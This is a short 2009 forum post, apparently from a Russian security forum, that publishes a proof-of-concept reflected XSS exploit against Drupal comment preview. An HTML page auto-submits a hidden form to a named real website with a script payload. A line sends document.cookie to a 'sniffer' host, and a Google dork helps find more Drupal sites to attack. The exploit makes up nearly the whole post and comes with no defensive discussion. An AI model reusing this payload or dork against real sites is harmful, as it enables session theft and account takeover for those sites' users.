23.02.2009, 22:13
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
PoC:
<HTML>
<TITLE>Drupal reflected XSS by ettee(itdefence.ru)</TITLE><!--
Full HTML =on
"">><<script>img = new Image(); img.src = "http://sniffer/image/s.gif?"+document.cookie;</script>
--><BODY onload="p.submit()">
<form action="http://freelanguage.org/comment/reply/532/1263"<!--target--
> method="post" id="p">
<input type=hidden name="subject" value="aaaaaaaaaaaaaaaaaaaaa">
<input type=hidden name="comment" value='"">><<script>alert(document.
cookie)</script>'>
<input type=hidden name="format" value="3">
<input type=hidden name="form_id" value="comment_form">
<input type=hidden name="op" value='Preview comment'>
</form>
</BODY>
</HTML>
Google dork: powered by "drupal"; intitle:"powered by drupal"
|
|
|